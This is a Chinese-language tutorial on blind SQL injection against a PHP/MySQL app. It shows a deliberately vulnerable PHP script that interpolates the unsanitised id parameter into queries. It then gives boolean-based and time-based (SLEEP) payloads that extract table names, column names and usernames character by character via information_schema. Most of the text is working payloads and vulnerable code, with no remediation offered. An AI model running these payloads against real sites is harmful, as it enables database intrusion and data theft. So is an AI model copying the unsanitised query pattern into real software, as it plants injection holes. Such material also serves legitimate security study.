一. 布尔盲注
布尔盲注是通过观察应用程序的响应（如HTTP 状态码等）来判断查询条件是否为真。

1.进行数据库配置连接

<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';$conn = new mysqli($host, $user, $password, $dbname);if ($conn->connect_error) {die("Connection failed: " . $conn->connect_error);
}// 获取用户输入的参数
$id = $_GET['id'];

2.构造布尔盲注查询

$query = "SELECT * FROM users WHERE id = $id AND 1=1";$result = $conn->query($query);

3.返回查询结果

if ($result->num_rows > 0) {echo "Query is TRUE (数据存在)";
} else {echo "Query is FALSE (数据不存在)";
}// 关闭连接
$conn->close();
?>

4.攻击者可以通过修改 `id` 参数，一点点推断数据库信息

获取表名：

sqlid=1 AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a'

获取列名：

sqlid=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'

获取数据：

sqlid=1 AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'

二. 时间盲注
时间盲注是通过在 SQL 查询中插入时间延迟函数（如 `SLEEP()`），根据数据库响应时间来判断查询条件是否为真。

1.数据库配置连接与布尔盲注相同

2.构造时间盲注查询

$query = "SELECT * FROM users WHERE id = $id AND IF(1=1, SLEEP(5), 0)";
$start_time = microtime(true); // 开始时间
$result = $conn->query($query);
$end_time = microtime(true); // 结束时间

3. 计算查询耗时

$query_time = $end_time - $start_time;

4.根据查询时间判断结果

if ($query_time > 5) {echo "Query is TRUE (延迟 5 秒)";
} else {echo "Query is FALSE (无延迟)";
}
// 关闭连接
$conn->close();
?>

5.攻击者可以通过修改 `id` 参数，逐步推断数据库信息

获取表名：

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),1,1))=97, SLEEP(5), 0)

获取列名：

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)

获取数据： 

sqlid=1 AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97, SLEEP(5), 0)

三.获取表,列,具体数据的函数

1：获取表名

使用布尔盲注或时间盲注，逐个字符推断表名。
 

sqlid=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0),1,1))=97

 

2：获取列名

使用布尔盲注或时间盲注，逐个字符推断列名。
 

sqlid=1 AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1 OFFSET 0),1,1))=117

3：获取数据

sqlid=1 AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1))=97